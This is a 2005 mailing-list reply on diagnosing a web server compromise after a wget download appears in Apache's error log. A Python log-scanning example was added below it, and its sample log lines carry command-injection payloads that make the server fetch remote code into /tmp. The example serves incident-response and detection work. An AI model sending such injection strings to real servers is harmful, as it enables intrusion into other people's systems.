Re: Am I Compromised -- Some interesting findings
On Fri, Nov 25, 2005 at 10:12:25PM +0530, Ritesh Raj Sarraf wrote:
> Now let's look a little of /var/log/apache2/error.log:
>
> Resolving maple.phpwebhosting.com... 70.86.76.34
> Connecting to maple.phpwebhosting.com[70.86.76.34]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 18,698 [text/plain]
>
> 0K .......... ........ 100% 210.37
> KB/s
Looks like it was downloaded via wget.
Run "grep wget /var/log/apache/access.log" - that should give you the
IP address of the attacking host.
It might be worth posting any matching lines; that way somebody might
be able to tell you which script (cgi/php/etc) was used as the attack
vector.
Definitely a time to wipe, reinstall and import your backups though.
> The logs show that the guy uploaded the files to /tmp and hid them.
Indeed, but we need to find out what allowed them to do so -
presumably something insecure running upon your host. Until you know
what it was, reinstalling will not prevent it from happening again.
Steve
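An added detection example, not code from the thread: it parses Apache combined-format access log lines (constructed sample lines with made-up client IPs and script paths; the download host is the one quoted above) and reports which client sent a request carrying a wget command and through which script, URL-decoding the request first so an encoded "wget" is not missed by a plain grep. Requests that merely come from a Wget user agent are kept apart, since those are downloads of your site rather than an injection.

```python
import re
from urllib.parse import unquote

# Apache combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Constructed sample lines (assumption: not from the original server's log).
SAMPLE_LOG = """\
203.0.113.5 - - [25/Nov/2005:21:58:02 +0530] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Nov/2005:22:03:11 +0530] "GET /cgi-bin/example.cgi?file=|wget%20http://maple.phpwebhosting.com/x.txt%20-O%20/tmp/.x| HTTP/1.1" 200 3412 "-" "Mozilla/4.0"
198.51.100.7 - - [25/Nov/2005:22:03:40 +0530] "GET /test.php?cmd=%77%67%65%74%20http://maple.phpwebhosting.com/x.txt HTTP/1.1" 200 88 "-" "Mozilla/4.0"
192.0.2.9 - - [25/Nov/2005:22:10:00 +0530] "GET /robots.txt HTTP/1.0" 404 211 "-" "Wget/1.9.1"
"""


def find_wget_hits(log_text):
    """Return (client_ip, script_path, where) for each line mentioning wget.

    where == "request":    the decoded request line carries wget (a command injected
                           through a script, which is what the thread is looking for)
    where == "user-agent": only the client software identifies itself as Wget
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        raw = m.group("request")
        parts = raw.split(" ")
        # Script path without its query string, decoded after the split so that
        # encoded spaces in the query cannot confuse the method/path/version layout.
        path = unquote(parts[1].split("?", 1)[0]) if len(parts) >= 2 else raw
        if "wget" in unquote(raw).lower():
            hits.append((m.group("ip"), path, "request"))
        elif m.group("agent") and "wget" in m.group("agent").lower():
            hits.append((m.group("ip"), path, "user-agent"))
    return hits


def suspect_hosts(log_text):
    """Map each client IP that injected a wget command to the scripts it used."""
    result = {}
    for ip, path, where in find_wget_hits(log_text):
        if where == "request" and path not in result.setdefault(ip, []):
            result[ip].append(path)
    return result


if __name__ == "__main__":
    for ip, scripts in suspect_hosts(SAMPLE_LOG).items():
        print(ip, "via", ", ".join(scripts))
```

On the sample, the second hit is only found because the request is decoded first; a literal grep for "wget" would report just the first one.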